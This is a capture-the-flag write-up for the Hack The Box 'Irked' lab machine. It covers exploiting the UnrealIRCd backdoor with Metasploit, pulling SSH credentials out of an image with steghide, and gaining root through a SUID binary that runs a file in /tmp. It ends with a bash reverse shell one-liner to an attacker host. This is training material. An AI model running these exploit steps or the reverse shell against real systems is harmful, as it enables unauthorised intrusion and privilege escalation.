Hack The Box - Irked

6 minute read

IrkedImage


Summary:


This machine highlighted a few issues such as supply chain compromise, the ease of hiding information using steganography, and how easily a vulnerable binary with the ‘sticky bit’ set can be abused.

Gaining Access Elevating Privileges
Backdoor in IRC service Binary with Sticky bit set
Spawn a stable shell with Python Insecure reference within binary
Backup file with stego password Create malicious bash script
SSH credentials hidden in picture  

Write-up

When starting this machine, I initially checked whether there was a website served over port 80, and through this found mention of an IRC service on the main webpage, this also contained a picture.

http://10.10.10.117/

IrkedWebpage

After saving the picture (you never know what will come in handy), I performed a scan of common UDP ports and all TCP ports which I let run in the background

nmap -sU -oA nmapUDP 10.10.10.117
nmap -p 1-65535 -oA nmapfull 10.10.10.117

This scan was unnecessary in the end; however, it can often be beneficial to run slower, comprehensive nmap scans while you perform other tasks as these may reveal items of interest which may otherwise go unnoticed.

Whilst this was running I took a look into common IRC ports, and found that port 6697 is commonly used for IRC services. Thinking this may be the case, I tried scanning it with nmap and found it to be open.

nmap -p 6697 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-28 11:07 ACST
Nmap scan report for 10.10.10.117
Host is up (0.34s latency).
PORT     STATE SERVICE
6697/tcp open  ircs-u

Backdoor in IRC Service

This was suspected to be the unreal ircd service, partially through the box name of ‘Irked’, so I checked exploitdb for any common exploits.

searchsploit ircd
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
																			 | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
DALnet Bahamut IRCd 4.6.5 - 'SUMMON' R | exploits/linux/remote/20043.c
FiSH-irssi 0.99 - Evil ircd Buffer Ove | exploits/linux/remote/17181.pl
Hybrid Ircd 5.0.3 p7 - Remote Buffer O | exploits/multiple/remote/19459.txt
IRCnet IRCD 2.10 - Local Buffer Overfl | exploits/linux/dos/23239.c
IrcDelphi Daemon Server - Denial of Se | exploits/windows/dos/14266.pl
SIRCD Server 0.5.2/0.5.3 - Operator Pr | exploits/multiple/remote/23396.txt
Snircd 1.3.4 - 'send_user_mode' Denial | exploits/multiple/dos/5306.txt
UnrealIRCd 3.2.8.1 - Backdoor Command  | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configurati | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Serv | exploits/windows/dos/27407.pl
ircd-hybrid 7.0.1 / ircd-ratbox 1.5.1/ | exploits/linux/dos/24222.c
ircd-hybrid 8.0.5 - Denial of Service  | exploits/linux/dos/24951.pl
methane IRCd 0.1.1 - Remote Format Str | exploits/linux/dos/22839.c
ngIRCd 0.6/0.7/0.8 - Remote Buffer Ove | exploits/linux/dos/25070.c
ngIRCd 0.8.1 - Remote Denial of Servic | exploits/linux/dos/789.c
ngIRCd 0.8.2 - Remote Format String    | exploits/linux/remote/784.c
--------------------------------------- ----------------------------------------

Given the exploit is a ruby package it was highly likely to be a metasploit module; however I went and confirmed this.

searchsploit -m 16922
head 16922.rb

As expected it was the metasploit module.

##
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

What is interesting is that this references a ‘backdoor’ rather than any kind of buffer overflow or exploit. Looking at the file more closely provides some further context to this.

cat 16922.rb

'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
'Description'    => %q{
		This module exploits a malicious backdoor that was added to the
	Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
	Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

So although this is now over 9 years old, it does show that for over 6 months this software had a malicious backdoor planted which went unnoticed. This is just another example of supply chain compromise which can lead to a security breach if software and their dependencies aren’t properly analysed.

Back to the exploitation, I ran the exploit titled unreal_ircd_3281_backdoor for unreal IRCD.

msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RPORT 6697
set RHOST 10.10.10.117
exploit

Success, I now had a low level reverse shell.

Spawn a stable shell with Python

To make sure I wouldn’t have to start over if my shell was to crash, I spawned a meterpreter shell under a new process.

use post/multi/manage/shell_to_meterpreter
set SESSION 1
exploit

From here I interacted with the newly created meterpreter shell, and dropped into another shell. This one was made interactive by spawning a tty shell using python.

This wasn’t exactly necessary, but it did allow me to have backups for if my shell was to crash (of which it did multiple times).

SESSIONS -i 2
shell
python -c 'import pty; pty.spawn("/bin/sh")'

From here I examined my default directory and went searching for the user.txt file:

/home/ircd/Unreal3.2

Backup file with stego password

Changing up directories I found a user located in /home/

/home/djmardov

ls -la Documents

user.txt

cat /Documents/user.txt 

core_channel_open: Operation failed: 1

At this point I knew I didn’t have enough access. Within the Documents folder there was also a hidden .backup file.

ls -la

-rw-r–r– 1 djmardov djmardov 52 May 16 2018 .backup -rw——- 1 djmardov djmardov 33 May 15 2018 user.txt

Viewing this file provided some clues.

cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

What was interesting is that it mentioned ‘steg’, an abbreviation of steganography. Given I had only found 1 unusual piece of media throughout my enumeration (the picture I downloaded from the main webpage), I figured perhaps this was hiding something.

SSH credentials hidden in picture

Using the common Steganography tool called steghide, I extracted a file from the downloaded picture using the password I had just located.

steghide --extract -sf irked.jpg 
UPupDOWNdownLRlrBAbaSSss

wrote extracted data to “pass.txt”

Reading this file revealed a random string which looked like it could be a password.

cat pass.txt 

Kab6h+m+bbp2J:HG

I was able to then use the username previously found under /home/ with this password to SSH into the server.

Gaining Access

ssh [email protected]
Kab6h+m+bbp2J:HG
cd Documents
cat user.txt 

User.txt: 4a66a … 67a8e


Binary with Sticky bit set

Running a common ‘one liner’, I then checked for any vulnerable binaries that I could exploit (the ones with the SUID bit set). More information about this can be found in my Zipper Write-up:

find / -perm -u=s -type f 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
**/usr/bin/viewuser**
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

This revealed an unusual ‘viewuser’ binary which isn’t commonly seen on linux distributions.

Running it provided some information.

viewuser
This application is being devloped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-01-20 02:54 (:0)
djmardov pts/1        2019-01-20 03:38 (10.10.15.130)
sh: 1: /tmp/listusers: not found

Insecure reference within binary

As mentioned in the error message shown, a file located at ‘/tmp/listusers’ did not exist, making it a perfect opportunity to escalate my privileges.

sh: 1: /tmp/listusers: not found

I created the file and set it so that anyone can interact with it.

touch /tmp/listusers
chmod 7777 /tmp/listusers

Create malicious bash script

Based on the mention of “sh” I assumed this binary would execute whatever bash script I set in this file, I edited it with nano to make it print the contents of the root.txt file.

nano /tmp/listusers
#!/bin/bash
cat /root/root.txt

Elevating Privileges

After running the binary again I had obtained what was required. At this stage I could execute any command with root privileges, including an elevated reverse shell with the below 1 liner.

#!/bin/bash
bash -i >& /dev/tcp/<myip>/8008 0>&1

root.txt: 8d8e9 … 2daf3


Final Notes

At the time of writing other HTB members had rated the machine elements as shown below. Feel free to reach out and provide any feedback or let me know if this helped.

Heatmap